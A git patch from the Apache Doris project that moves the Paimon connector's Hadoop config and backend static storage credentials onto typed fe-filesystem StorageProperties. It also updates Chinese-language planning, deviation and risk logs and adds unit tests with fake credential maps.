test——R-006 的 fe-filesystem 断言须经用户批准才动)、`fe-property` 模块删除。 +- paimon 连接器现**允许** import `org.apache.doris.filesystem.properties.*`(fe-filesystem-api,目标边);**禁** `org.apache.doris.{property,catalog,common,datasource,qe,...}`(import-gate 守)。 +- 每次提交前 `git diff --name-only` 对照白名单。 ## 关键链接 - 设计:[`../designs/metastore-storage-property-refactor-design-2026-06-17.md`](../designs/metastore-storage-property-refactor-design-2026-06-17.md) - 流程:[`WORKFLOW.md`](./WORKFLOW.md) | 任务:[`tasks.md`](./tasks.md) | 决策:[`decisions-log.md`](./decisions-log.md) | 偏差:[`deviations-log.md`](./deviations-log.md) | 风险:[`risks.md`](./risks.md) +- 对抗 review(P1-T03):workflow `wf_76df09a4-c2f`(transcript 在 session subagents 目录) diff --git a/plan-doc/metastore-storage-refactor/PROGRESS.md b/plan-doc/metastore-storage-refactor/PROGRESS.md index 0a074368009de6..af29a86780ffb1 100644 --- a/plan-doc/metastore-storage-refactor/PROGRESS.md +++ b/plan-doc/metastore-storage-refactor/PROGRESS.md @@ -10,17 +10,17 @@ |---|---|---| | Research(调研) | ██████████ 100% | ✅ 完成(8-agent + grep;+ 3-agent recon 复核 D-006/7/8) | | Design(设计) | ██████████ 100% | ✅ 完成(设计文档 + **7 决策** D-001..D-008,范围已收窄) | -| **Implement(实现)** | ████░░░░░░ ~29% | 🚧 **进行中**(范围 P0+P1 已获批;P0 ✅;P1 2/6,fe-core/spi 侧管线全完成) | +| **Implement(实现)** | █████░░░░░ ~36% | 🚧 **进行中**(范围 P0+P1 已获批;P0 ✅;P1 3/6,连接器侧已起步:paimon storage 改走 fe-filesystem-api) | -任务计数:**4 / 14** 完成(P0: 2/2 ✅ | P1: 2/6 | P2: 0/5 | **P3a: 0/1**)| + **P3b**(全量去重 follow-up,范围外占位)。 +任务计数:**5 / 14** 完成(P0: 2/2 ✅ | P1: 3/6 | P2: 0/5 | **P3a: 0/1**)| + **P3b**(全量去重 follow-up,范围外占位)。 --- ## 当前活跃 task -- **下一个:`P1-T03`**(paimon `PaimonCatalogFactory.applyStorageConfig` 改走 `ctx.getStorageProperties()` 的 `toHadoopConfigurationMap()`,**含 T1 等价性测试**)。 -- P0-T01 ✅|P0-T02 ✅(bindAll)|P1-T01 ✅(getStorageProperties 默认方法 + 边)|**P1-T02 ✅**(getStorageProperties 实现 + FileSystemFactory accessor,TDD 4 绿 + 2 回归绿)。 -- ✅ **fe-core/spi 侧管线已通**:fe-core 绑定下发(getOrigProps→bindAll→live manager)→ ConnectorContext.getStorageProperties() → 连接器(待 P1-T03 消费)。fe-core 改动 3 文件均 additive(DefaultConnectorContext + FileSystemPluginManager + FileSystemFactory)。 -- ▶ **下一阶段是连接器侧**(P1-T03/T04/T05 改 paimon + P1-T06 验证)——与 fe-core 侧不同性质,含 T1 等价性核心风险 R-001。 +- **下一个:`P1-T04`**(paimon `PaimonScanPlanProvider` BE 静态凭据从 `ctx.getBackendStorageProperties()` 切到遍历 `getStorageProperties()` 调 `toBackendProperties().toMap()`;vended 动态路径不动)。 +- P0-T01 ✅|P0-T02 ✅(bindAll)|P1-T01 ✅(getStorageProperties 默认方法 + 边)|P1-T02 ✅(getStorageProperties 实现 + FileSystemFactory accessor)|**P1-T03 ✅**(paimon `PaimonCatalogFactory.applyStorageConfig` 改走 `ctx.getStorageProperties().toHadoopConfigurationMap()`;连接器侧首个 task)。 +- ✅ **连接器 storage 配置路已切**:`PaimonConnector.buildStorageHadoopConfig()` 经 `ctx.getStorageProperties()` 取 fe-filesystem typed → `toHadoopConfigurationMap()` → 3 个 `PaimonCatalogFactory.buildXxx` 叠加(保留 paimon.*/raw 覆盖 last-write-wins)。paimon main 已零 `org.apache.doris.property` import(DV-003-b:P1-T05 仅剩删 pom 边)。 +- ▶ **下一步**:P1-T04(BE 凭据切 `toBackendProperties().toMap()`)→ P1-T05(删 paimon→fe-property pom 边)→ P1-T06(docker 5-flavor,真等价闸 Option C;并验 R-006 调优默认)。 ## 阻塞 / 待决 - ✅ 范围已获批(2026-06-17)= **P0+P1(storage 收口),做到 P1-T06 gate 停**。 @@ -30,6 +30,7 @@ --- ## 最近动态(最近 7 天) +- 2026-06-17 **P1-T03 ✅**(commit `[P1-T03]`;连接器侧首个 task;paimon `applyStorageConfig` 改走 `ctx.getStorageProperties().toHadoopConfigurationMap()`):recon 证 ctx 在 `PaimonConnector.createCatalog()` 可达 → `buildStorageHadoopConfig()` 合并下发;保留 paimon.*/raw 覆盖 last-write-wins。**T1 = Option C**(用户选;fe-filesystem 对象存储 impl 是运行时插件不在单测 classpath → paimon UT 只钉 connector-local 契约,真等价由 docker P1-T06 兜底;DV-003)。TDD RED(neuter forEach → 3 测红)→GREEN;删 ~23 canonical 测试(fe-filesystem 职责)+ 6 新契约测试;**292/0/0/1skip + checkstyle 0 + import-gate PASS + 白名单干净**。**对抗 review `wf_76df09a4-c2f`** 推翻假 1B+2M、confirm 1M=**R-006**(调优默认 50/3000/1000、100/10000/10000 fe-filesystem 无显式 UT 守护;功能正确,docker 兜底,fe-filesystem 加断言 follow-up 超白名单)。⚠️ docker e2e 未跑。 - 2026-06-17 **P1-T02 ✅**(`DefaultConnectorContext.getStorageProperties()` + `FileSystemFactory.bindAllStorageProperties`,D-009 二次确认 3 文件):TDD 4 绿(factory 委托/fallback + ctx 空/全量绑定捕获 raw map)+ 回归 2 绿;checkstyle 0;raw map 经 `getOrigProps()` 取。**fe-core 侧管线打通**。 - 2026-06-17 **P1-T01 ✅**(`ConnectorContext.getStorageProperties()` 默认空列表 + `fe-connector-spi→fe-filesystem-api` pom 边):TDD(RED assertNotNull→GREEN 1/1)+ checkstyle 0 + import-gate PASS;新建首个 fe-connector-spi 测试。 - 2026-06-17 **P0-T02 ✅**(`FileSystemPluginManager.bindAll`,D-009):TDD(RED 5 错→GREEN 5 绿)+ checkstyle 0;纯新增 34 行不动既有方法。实证发现真对象存储 providers 是运行时目录插件(非 fe-core 单测 classpath)→ 删 real-S3 集成测试移交 P1-T06;并发现 P1-T02 须经 `FileSystemFactory` static accessor 取 live manager(第 3 fe-core 文件,待 AskUserQuestion)。 diff --git a/plan-doc/metastore-storage-refactor/deviations-log.md b/plan-doc/metastore-storage-refactor/deviations-log.md index 61aef795761e68..c6397c09665155 100644 --- a/plan-doc/metastore-storage-refactor/deviations-log.md +++ b/plan-doc/metastore-storage-refactor/deviations-log.md @@ -6,6 +6,16 @@ --- +## DV-003 — T1 自动等价测试不可在 UT 落地 → 改「connector-local 契约 UT + docker 兜底」;并连带 P1-T03 提前删 fe-property import + 删 ~23 canonical 测试 +- **日期**:2026-06-17 | **原计划位置**:设计 §5 T1 / WORKFLOW §5.2 T1(DV-002 框架:「新 `toHadoopConfigurationMap()` 与旧 `buildObjectStorageHadoopConfig` 在常见静态凭据路径 key/value **全等**」作为切换回归闸);task P1-T03、P1-T05。 +- **DV-003-a(T1 落地形态,用户 2026-06-17 选 Option C)**: + - **为何不可行(现场 recon 取证)**:算 T1「新产物」须绑真 fe-filesystem 对象存储 `StorageProperties`,而其 impl 模块(`fe-filesystem-{s3,oss,cos,obs}`)是 `Env.loadPlugins` **运行时目录插件**——`fe-core` pom 注「impl 运行时依赖在 Phase 4 P4.1 移除」(仅留 `fe-filesystem-local` test-scope)、paimon 从无。故 **fe-core 与 paimon 任一单测 classpath 都绑不出**真 S3/OSS/COS/OBS fe-filesystem 实例 → 字面 key/value 等价测试无法在 UT 写。强行把 impl 拖进单测 classpath 既破"impl 仅运行时"架构,又冒本仓历史反复出现的 paimon 跨 loader / classpath 中毒风险。 + - **新方案(Option C)**:paimon UT **只钉 connector-local 契约**(合成 storage map → 落 conf/HiveConf + `paimon.*` 改键 + 原始 `fs./dfs./hadoop.` 透传 + **last-write-wins** + kerberos-在-storage-叠加-之后);**真 key/value 等价由 P1-T06 docker 5-flavor 兜底**;P0-T01 4-agent recon + DV-002 的 code-read 等价(fe-filesystem ⊇ fe-property 超集差异已记)为依据。**修订 DV-002 的「自动 key/value 全等 UT」→「契约 UT + docker 闸」**。 + - **被否选项**:(B) paimon 内加 fe-filesystem impl test-scope 依赖自建等价测试 = transient(P1-T05 paimon 弃 fe-property 即须删)+ 重复 SDK 依赖 + 与 paimon 自带 hadoop-aws classpath 冲突风险;(A) fe-core companion 等价测试 = 同样须把运行时-only impl 拖进 fe-core test classpath + 扩 fe-core 白名单(新测试文件 + test-scope pom)。两者都把运行时插件拖进单测,user 否。 +- **DV-003-b(import 顺序连带)**:`PaimonCatalogFactory` 的 `org.apache.doris.property.storage.StorageProperties` import **仅** :393 一处用(`buildObjectStorageHadoopConfig`)。P1-T03 删该 call 即孤立 import → checkstyle 报未用 import → **P1-T03 必同删 import**(原 P1-T05 计划"删 :20 import")。**P1-T05 退化为仅删 pom `fe-property` 依赖边 + `grep org.apache.doris.property` 归零闸**(call/import 已在 T03 清)。 +- **覆盖核对(删 canonical 测试)**:现 `PaimonCatalogFactoryTest` ~23 个 S3/OSS/COS/OBS/MinIO canonical 翻译测试测的是 fe-filesystem 现职责。**对抗 review(`wf_76df09a4-c2f`,8 agent,1 BLOCKER+3 MAJOR+2 MINOR;verify 推翻 BLOCKER[删 buildHmsHiveConf 重载=唯 paimon 调用方全已改]+2 MAJOR[endpoint-pattern/OSS-derivation 经核实 fe-filesystem 已覆盖])+ 直接核实**:fe-filesystem 覆盖 **canonical 键翻译 + endpoint-from-region 派生**(`S3FileSystemPropertiesTest.toHadoopConfigurationMap`、`OssFileSystemPropertiesTest:108-110`、Cos/Obs),**但 NOT 覆盖调优默认值**(S3 50/3000/1000、OSS/COS/OBS 100/10000/10000)→ 删 paimon tuning 测试丢了**显式 UT 守护**(功能今日正确=fe-filesystem 字段默认真发;测试健壮性缺口)→ **记 R-006**(docker P1-T06 兜底 + fe-filesystem 加断言 follow-up,超白名单)。**初判「已全覆盖」修正为「键翻译+派生已覆盖、调优默认未守护」。** +- **影响范围**:P1-T03 实现与测试改造、P1-T05 范围缩减;设计 §5 T1 / WORKFLOW §5.2 T1 待回写(DV-003 脚注);risks R-001 缓解更新(自动 UT 闸 → docker 闸)。不影响 P2/P3a。 + ## DV-002 — T1 等价性从「全等」放宽为「常见静态凭据路径全等 + 文档记超集」 - **日期**:2026-06-17 | **原计划位置**:设计 §5 T1 / §6.4 验收 item 4 / WORKFLOW §5.2 T1("新 == 旧 key/value **全等**")。 - **为何不可行(P0-T01 取证)**:fe-filesystem `toHadoopConfigurationMap()`/`toBackendProperties().toMap()` 是 paimon 现走 fe-property 路(`buildObjectStorageHadoopConfig`)的**超集**,非全等: diff --git a/plan-doc/metastore-storage-refactor/risks.md b/plan-doc/metastore-storage-refactor/risks.md index 6d3d6fae39c61c..f1c12ced0e4a59 100644 --- a/plan-doc/metastore-storage-refactor/risks.md +++ b/plan-doc/metastore-storage-refactor/risks.md @@ -8,8 +8,14 @@ ## R-001 — 新旧 Storage 配置/BE map 等价性漂移 | 状态:监控中 - **描述**:新 `toHadoopConfigurationMap()`/`toBackendProperties().toMap()` 与 fe-core 旧 `getHadoopStorageConfig()`/`getBackendConfigProperties()` 可能在某些键/默认值上不一致。已知默认调优值分叉:S3=50/3000/1000 vs OSS/COS/OBS=100/10000/10000。 - **影响**:paimon 读私有桶 403、Hadoop FS 行为变化、静默错误。 -- **缓解**:**T1 等价性测试**(P1-T03/T06 强制,逐键逐值对照,含默认调优值)。 -- **触发判据**:T1 任一键/值不等。 +- **缓解(DV-003 修订)**:T1 自动逐键 UT **不可在单测落地**(fe-filesystem 对象存储 impl 是运行时插件,不在任何单测 classpath)→ 改为 **paimon connector-local 契约 UT**(storage map 叠加/last-write-wins/kerberos-ordering)+ **docker P1-T06 5-flavor 作真等价闸**;P0-T01 4-agent recon + DV-002 code-read 等价为依据。 +- **触发判据**:docker P1-T06 任一 flavor 读私有桶 403 / 配置缺键。 + +## R-006 — 调优默认值(tuning defaults)无显式 UT 守护(P1-T03 删 canonical 测试暴露的 fe-filesystem 测试缺口)| 状态:监控中 +- **描述**:P1-T03 删 paimon `buildHadoopConfigurationEmitsS3TuningDefaults` 等 canonical 测试(翻译职责移交 fe-filesystem)。对抗 review(`wf_76df09a4-c2f`)确认 + 直接核实:fe-filesystem `S3FileSystemPropertiesTest.toHadoopProperties_*` **不显式断言**调优默认值(`fs.s3a.connection.maximum=50`/`request.timeout=3000`/`timeout=1000`;line72 只设输入 `s3.connection.maximum=64` 非断默认),`Oss/Cos/ObsFileSystemPropertiesTest` 同样**零调优断言**(OSS/COS/OBS 默认 100/10000/10000)。**canonical 键翻译 + endpoint-from-region 派生 IS 已覆盖**(已核:`OssFileSystemPropertiesTest:108-110` region→`-internal` endpoint、Cos/Obs endpoint+creds),唯**调优默认值**裸奔。 +- **影响**:**功能今日正确**(`S3FileSystemProperties.toHadoopConfigurationMap()` 经字段默认 `DEFAULT_MAX_CONNECTIONS="50"` 等真发,paimon `buildStorageHadoopConfig` 正确调用);但若未来改 fe-filesystem 误删某调优默认,**无 UT 报红**(仅 docker 运行期暴露)→ 测试健壮性回归。 +- **缓解**:**docker P1-T06** 为运行期兜底;**建议 follow-up**(**超出当前 P1 白名单——fe-filesystem 禁碰**):在 `S3FileSystemPropertiesTest` + `Oss/Cos/ObsFileSystemPropertiesTest` 加调优默认断言(test-only additive)。在 fe-filesystem 收口/迁移批次或经用户批准的小补丁中做。**不在 paimon 重复断言**(Option C:paimon 无 fe-filesystem impl 于测试 classpath,合成 map 断言为同义反复,不守 fe-filesystem 默认)。 +- **触发判据**:fe-filesystem 调优默认被改且 docker P1-T06 未跑 → 静默 mis-tune。 ## R-002 — 双 Storage 路径并存窗口 | 状态:监控中 - **描述**:迁移期 fe-core 旧 storage(hive/hudi/iceberg 用)与 fe-filesystem 新 storage(paimon 用)并存;同一 catalog 若两路推出不同配置会冲突。 diff --git a/plan-doc/metastore-storage-refactor/tasks.md b/plan-doc/metastore-storage-refactor/tasks.md index 220780d87091ba..00978c692b5701 100644 --- a/plan-doc/metastore-storage-refactor/tasks.md +++ b/plan-doc/metastore-storage-refactor/tasks.md @@ -42,10 +42,16 @@ - **✅ 已解(用户 2026-06-17 二次确认)**:`getStorageProperties()` 须用 live(loadPlugins 过的)manager,只能经 `FileSystemFactory` static accessor 取(构造点被禁)→ 白名单 +`FileSystemFactory.java`(D-009 二次确认)。`getOrigProps()` = 完整 raw map 已核实(`createAll(origProps)` 全量传入 + `ConnectionProperties` 整存)。 - **完成态**:`FileSystemFactory.bindAllStorageProperties`(+32 纯新增,live manager 委托 / ServiceLoader fallback,镜像 getFileSystem)+ `DefaultConnectorContext.getStorageProperties`(+21 纯新增,getOrigProps→factory,空 supplier 短路)。TDD:4 新测试(factory 委托/fallback + ctx 空/全量绑定捕获 raw map)RED(stub UOE/NPE)→ GREEN 4/4;回归 `BackendStoragePropsTest` 2/2 + `FileSystemPluginManagerTest` 5/5 不变。checkstyle 0。3 fe-core 文件全 additive,无 property 包/构造点/其它连接器改动。 -### P1-T03 ⬜ PaimonCatalogFactory.applyStorageConfig 改走 toHadoopConfigurationMap +### P1-T03 ✅ PaimonCatalogFactory.applyStorageConfig 改走 toHadoopConfigurationMap(2026-06-17,commit `[P1-T03]`,TDD RED→GREEN,292/0/1skip + checkstyle 0 + 对抗 review) - **做什么**:把 `fe-property StorageProperties.buildObjectStorageHadoopConfig(props)` 换成"遍历 `ctx.getStorageProperties()` 调 `toHadoopProperties().toHadoopConfigurationMap()`";**保留**其后的 `paimon.*/fs./dfs./hadoop.` 覆盖块(保序 last-write-wins)。 - **验收**:T1 等价性测试通过(新 HiveConf/Configuration 键值 == 旧);HMS/DLF HiveConf 的 kerberos 条件键仍在 storage 叠加之后。 - **依赖**:P1-T01(签名),调用侧需 ctx 传入(P1-T02 提供运行期值,UT 可注入)。设计 §4 P1-3 / §5 R1。 +- **现场 recon 结论(2026-06-17,对照真实代码)**: + - **ctx 可达性 = 解(无阻碍)**:3 个 `buildXxx` 调用方(`buildHadoopConfiguration` :133/:144、`buildHmsHiveConf` :166、`buildDlfHiveConf` :183)全在 `PaimonConnector.createCatalog()` 实例方法内,已持 `this.context`。→ 在 `PaimonConnector` 算好 `Map storageHadoopConfig`(遍历 `context.getStorageProperties()` 调 `toHadoopProperties().toHadoopConfigurationMap()` 合并)传入 3 个 builder;`PaimonCatalogFactory` 保持纯静态、**零 fe-filesystem-api 类型**(迭代留在 connector)。仅改 `PaimonConnector` + `PaimonCatalogFactory` 两文件(+pom 加 `fe-filesystem-api` 直接依赖)。 + - **import 顺序连带(DV-003-b)**:`org.apache.doris.property.storage.StorageProperties` 仅在 :393 用 → T03 删 call 即孤立 import → checkstyle 会红 → T03 必同删 import;P1-T05 退化为仅删 pom `fe-property` 边 + grep 闸。 + - **T1 闸 = Option C(用户 2026-06-17 选,DV-003-a)**:fe-filesystem 对象存储 impl(`fe-filesystem-{s3,oss,cos,obs}`)是**运行时目录插件**,不在任何单测 classpath(fe-core P4.1 已删、paimon 从无)→ 无法在 UT 绑真 fe-filesystem 实例算"新产物"。故 paimon UT **只钉 connector-local 契约**(合成 storage map → 落 conf/HiveConf + `paimon.*` 改键 + 原始 `fs./dfs./hadoop.` 透传 + last-write-wins + kerberos-在-storage-之后),**真等价由 P1-T06 docker 5-flavor 兜底**,P0-T01/DV-002 code-read 等价为依据。 + - **删 ~23 个 canonical-translation 测试**:现 `PaimonCatalogFactoryTest` 的 S3/OSS/COS/OBS/MinIO canonical 翻译断言测的是 **fe-filesystem 现在的职责**。**对抗 review(`wf_76df09a4-c2f`)+ 直接核实结论(修正初判)**:fe-filesystem 已覆盖 **canonical 键翻译**(`S3FileSystemPropertiesTest.toHadoopConfigurationMap`→fs.s3a.impl/endpoint/region/access.key/path.style)**+ endpoint-from-region 派生**(`OssFileSystemPropertiesTest:108-110` region→`-internal`;Cos/Obs endpoint+creds);**但 NOT 覆盖调优默认值**(S3 50/3000/1000、OSS/COS/OBS 100/10000/10000)→ 删 paimon `buildHadoopConfigurationEmitsS3TuningDefaults` 等丢了这部分**显式 UT 守护**(**功能今日正确**,由 fe-filesystem 字段默认真发;仅测试健壮性缺口)→ **记 R-006**,docker P1-T06 运行期兜底,fe-filesystem 加断言为 follow-up(超白名单)。保留并加 storage 参数的 = paimon.* 改键 / 原始透传 / last-write-wins / kerberos-ordering(含新增 storage-overlay 变体)/ DLF dlf.catalog.* 键与 endpoint-from-region(paimon-local) / hiveConfResources base-merge / socket-timeout / username alias / requireOssStorageForDlf 闸 / buildCatalogOptions / validate。 +- **完成态(2026-06-17)**:实现 = `PaimonCatalogFactory`(applyStorageConfig 收 `storageHadoopConfig` 入参替代 `buildObjectStorageHadoopConfig(props)` call、删 fe-property import、3 builder 加参、HMS 三重载并为单一 3-arg)+ `PaimonConnector`(新增 `buildStorageHadoopConfig()` 遍历 `ctx.getStorageProperties().toHadoopProperties().toHadoopConfigurationMap()` 合并、4 调用点传入、REST 不用)+ pom 加 `fe-filesystem-api` 直接依赖(fe-property 依赖**留** P1-T05 删)。TDD:neuter `storageHadoopConfig.forEach(setter)` → 3 个 Applies/Overlays 测试 RED(`expected was `)→ 恢复 → GREEN。测试改造:删 ~23 canonical(fe-filesystem 职责,R-006 调优默认缺口)+ 留 adapt + 新增 6 契约测试(3 builder 各 Applies/Overlays storage + explicit-fs.s3a-overrides-storage + paimon-prefix-overrides-storage + kerberos-survives-storage-overlay)。验证:paimon 全模块 **292/0/0/1skip**(docker-gated PaimonLiveConnectivityTest)、`PaimonCatalogFactoryTest` 42/0、checkstyle 0、import-gate PASS、白名单干净。**对抗 review `wf_76df09a4-c2f`**(8 agent,1B+3M+2m;verify 推翻 1B+2M,confirm 1M=R-006 调优默认 UT 缺口[功能正确仅测试健壮性])。⚠️ **docker e2e 未跑**(真等价 Option C 闸在 P1-T06)。**DV-003-b**:fe-property import 已在 T03 删(P1-T05 退化为仅删 pom 边 + grep 闸)。 ### P1-T04 ⬜ PaimonScanPlanProvider BE 静态凭据改走 toBackendProperties().toMap() - **做什么**:BE 静态凭据从 `ctx.getBackendStorageProperties()` 改为遍历 `getStorageProperties()` 调 `toBackendProperties().toMap()`。vended 动态路径**不动**(仍 `ctx.vendStorageCredentials`)。 From 60c6a50bb6e43efd361a6a307b3ee88530564a7b Mon Sep 17 00:00:00 2001 From: morningman Date: Wed, 17 Jun 2026 21:34:39 +0800 Subject: [PATCH 082/128] [P1-T04] fe-connector-paimon: BE static creds via ctx.getStorageProperties().toBackendProperties() (typed fe-filesystem seam) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Switch PaimonScanPlanProvider's BE static-credential emission from the legacy ctx.getBackendStorageProperties() seam to iterating the typed fe-filesystem ctx.getStorageProperties() and merging each toBackendProperties().toMap() into location.* scan props. Vended overlay unchanged and still applied after (vended overlays static). Per user decision: full switch, accepting the HDFS BE regression — fe-filesystem has no typed HDFS BE model yet (HdfsFileSystemProvider throws on bind, bindAll skips it), so getStorageProperties() yields no HDFS entry and the hadoop/dfs/HA/ kerberos keys that became THdfsParams are dropped. Recorded as DV-004 / R-007 with follow-up FU-T01 (add fe-filesystem HdfsFileSystemProperties). Note: this switch is NOT required by P1-T05 (getBackendStorageProperties is a ConnectorContext seam, not a fe-property dependency); it is the D-003 uniform-typed-consumption goal. Adversarial review (wf_09745716-d48, 10 agents) confirmed R-008: typed OSS/COS/OBS models omit AWS_CREDENTIALS_PROVIDER_TYPE (legacy emitted ANONYMOUS for credential- less catalogs) -> follow-up FU-T02. Three test-gap findings fixed by a new test covering the .ifPresent skip + multi-entry merge. paimon module 292/0/1skip, PaimonScanPlanProviderTest 52/0, checkstyle 0, import-gate PASS, whitelist clean. docker e2e NOT run. Co-Authored-By: Claude Opus 4.8 (1M context) --- .../paimon/PaimonScanPlanProvider.java | 31 +++- .../paimon/PaimonScanPlanProviderTest.java | 154 +++++++++++++++++- .../metastore-storage-refactor/HANDOFF.md | 46 +++--- .../metastore-storage-refactor/PROGRESS.md | 14 +- .../deviations-log.md | 10 ++ plan-doc/metastore-storage-refactor/risks.md | 12 ++ plan-doc/metastore-storage-refactor/tasks.md | 25 ++- 7 files changed, 248 insertions(+), 44 deletions(-) diff --git a/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonScanPlanProvider.java b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonScanPlanProvider.java index a9ff8d3aa87590..d865a8d81d3539 100644 --- a/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonScanPlanProvider.java +++ b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonScanPlanProvider.java @@ -24,6 +24,7 @@ import org.apache.doris.connector.api.scan.ConnectorScanPlanProvider; import org.apache.doris.connector.api.scan.ConnectorScanRange; import org.apache.doris.connector.spi.ConnectorContext; +import org.apache.doris.filesystem.properties.StorageProperties; import org.apache.doris.thrift.TColumnType; import org.apache.doris.thrift.TFileScanRangeParams; import org.apache.doris.thrift.TPaimonDeletionFileDesc; @@ -595,15 +596,29 @@ public Map getScanNodeProperties( } // FIX-STATIC-CREDS-BE (B-9): static catalog-level storage credentials/config, normalized to - // BE-canonical keys (AWS_* for object stores, hadoop/dfs for HDFS). Ports legacy - // PaimonScanNode.getLocationProperties() = getBackendPropertiesFromStorageMap(storagePropertiesMap): - // BE's native (FILE_S3) reader understands ONLY the canonical keys, so the raw catalog aliases - // (s3.access_key, oss.access_key, …) must be translated before they leave FE — copying them - // verbatim gives the native reader no usable creds (403 on a private bucket). The connector - // cannot import fe-core StorageProperties -> it delegates to the ConnectorContext seam. Empty - // when no context (offline unit tests) -> no storage props emitted (never the broken raw aliases). + // BE-canonical keys (AWS_* for object stores). BE's native (FILE_S3) reader understands ONLY the + // canonical keys, so the raw catalog aliases (s3.access_key, oss.access_key, …) must be translated + // before they leave FE — copying them verbatim gives the native reader no usable creds (403 on a + // private bucket). Sourced from the typed fe-filesystem StorageProperties bound by fe-core and + // handed over via ctx.getStorageProperties() (P1-T04): each backend's toBackendProperties().toMap() + // yields the canonical map (e.g. S3FileSystemProperties IS-A BackendStorageProperties → AWS_*). + // This replaces the legacy getBackendStorageProperties() seam so the connector derives BOTH its + // Hadoop config (P1-T03) and its BE creds from the SAME typed source (design D-003). Empty when no + // context (offline unit tests) → no storage props emitted (never the broken raw aliases). + // + // KNOWN GAP 1 (DV-004 / R-007): fe-filesystem has no typed HDFS BE model yet (HdfsFileSystemProvider + // throws on bind), so an HDFS-warehouse catalog yields NO entry here → the legacy hadoop/dfs/HA/ + // kerberos keys that became THdfsParams are dropped, regressing HDFS-backed paimon native reads. + // Accepted by the user pending a follow-up that adds fe-filesystem HdfsFileSystemProperties. + // KNOWN GAP 2 (R-008): the typed OSS/COS/OBS models omit AWS_CREDENTIALS_PROVIDER_TYPE, which legacy + // emitted as ANONYMOUS for credential-less catalogs — a fe-filesystem parity gap (out of P1 whitelist), + // tracked as a follow-up; only affects OSS/COS/OBS catalogs with no static ak/sk. if (context != null) { - for (Map.Entry e : context.getBackendStorageProperties().entrySet()) { + Map backendStorageProps = new HashMap<>(); + for (StorageProperties sp : context.getStorageProperties()) { + sp.toBackendProperties().ifPresent(b -> backendStorageProps.putAll(b.toMap())); + } + for (Map.Entry e : backendStorageProps.entrySet()) { props.put("location." + e.getKey(), e.getValue()); } } diff --git a/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonScanPlanProviderTest.java b/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonScanPlanProviderTest.java index 1be2513cb30b63..5ba747182cd6a3 100644 --- a/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonScanPlanProviderTest.java +++ b/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonScanPlanProviderTest.java @@ -21,6 +21,11 @@ import org.apache.doris.connector.api.handle.ConnectorColumnHandle; import org.apache.doris.connector.api.scan.ConnectorScanRange; import org.apache.doris.connector.spi.ConnectorContext; +import org.apache.doris.filesystem.FileSystemType; +import org.apache.doris.filesystem.properties.BackendStorageKind; +import org.apache.doris.filesystem.properties.BackendStorageProperties; +import org.apache.doris.filesystem.properties.StorageKind; +import org.apache.doris.filesystem.properties.StorageProperties; import org.apache.doris.thrift.TFileScanRangeParams; import org.apache.doris.thrift.TPrimitiveType; import org.apache.doris.thrift.schema.external.TField; @@ -1221,10 +1226,11 @@ public void extractVendedTokenEmptyForNullAndNonRestFileIO() { "a non-RESTTokenFileIO table must yield no vended token"); } - /** A ConnectorContext whose getBackendStorageProperties / vendStorageCredentials return fixed - * normalized maps. The engine's real StorageProperties normalization is exercised by the fe-core - * DefaultConnectorContextBackendStoragePropsTest / DefaultConnectorContextVendTest; here we pin the - * connector wiring (overlay order + that the raw catalog aliases are NOT shipped). */ + /** A ConnectorContext whose getStorageProperties() (typed fe-filesystem seam, P1-T04) and + * vendStorageCredentials return fixed normalized maps. The engine's real StorageProperties + * binding/normalization is exercised by the fe-core DefaultConnectorContextStoragePropsTest / + * DefaultConnectorContextVendTest; here we pin the connector wiring (static creds sourced from + * toBackendProperties().toMap(), overlay order, and that the raw catalog aliases are NOT shipped). */ private static ConnectorContext scanContext(Map backendStatic, Map vended) { return new ConnectorContext() { @Override @@ -1238,8 +1244,10 @@ public long getCatalogId() { } @Override - public Map getBackendStorageProperties() { - return backendStatic; + public List getStorageProperties() { + return backendStatic.isEmpty() + ? Collections.emptyList() + : Collections.singletonList(fakeBackendStorage(backendStatic)); } @Override @@ -1249,6 +1257,58 @@ public Map vendStorageCredentials(Map raw) { }; } + /** + * A fe-filesystem {@link StorageProperties} whose {@code toBackendProperties().toMap()} returns the + * given BE-canonical map — mirrors how a real object-store binding (e.g. S3FileSystemProperties IS-A + * {@link BackendStorageProperties}) hands BE creds to the connector. The connector consumes ONLY this + * typed seam for static creds (P1-T04), so the fake exercises exactly that path. (HDFS has no typed BE + * model in fe-filesystem yet, so a real HDFS catalog yields no entry here — see DV-004 / R-007.) + */ + private static StorageProperties fakeBackendStorage(Map beMap) { + BackendStorageProperties backend = new BackendStorageProperties() { + @Override + public BackendStorageKind backendKind() { + return BackendStorageKind.S3_COMPATIBLE; + } + + @Override + public Map toMap() { + return beMap; + } + }; + return new StorageProperties() { + @Override + public String providerName() { + return "fake"; + } + + @Override + public StorageKind kind() { + return StorageKind.OBJECT_STORAGE; + } + + @Override + public FileSystemType type() { + return FileSystemType.S3; + } + + @Override + public Map rawProperties() { + return Collections.emptyMap(); + } + + @Override + public Map matchedProperties() { + return Collections.emptyMap(); + } + + @Override + public Optional toBackendProperties() { + return Optional.of(backend); + } + }; + } + @Test public void getScanNodePropertiesNormalizesStaticCreds() { FakePaimonTable table = new FakePaimonTable( @@ -1351,6 +1411,88 @@ public void getScanNodePropertiesNoContextNoStorageProps() { "no context -> no normalized overlay"); } + @Test + public void getScanNodePropertiesSkipsStoragePropsWithoutBackendMappingAndMergesRest() { + FakePaimonTable table = new FakePaimonTable( + "t1", rowType("id"), Collections.emptyList(), Collections.emptyList()); + PaimonTableHandle handle = new PaimonTableHandle( + "db1", "t1", Collections.emptyList(), Collections.emptyList()); + handle.setPaimonTable(table); + + Map beMap = new HashMap<>(); + beMap.put("AWS_ACCESS_KEY", "ak"); + beMap.put("AWS_ENDPOINT", "ep"); + // A typed list mixing a backend WITHOUT a BE model (toBackendProperties() empty — the real HDFS + // case, see DV-004/R-007) and a real object-store backend. Exercises the two facets the single-entry + // tests miss: the .ifPresent skip and the multi-entry putAll merge. + List storage = + 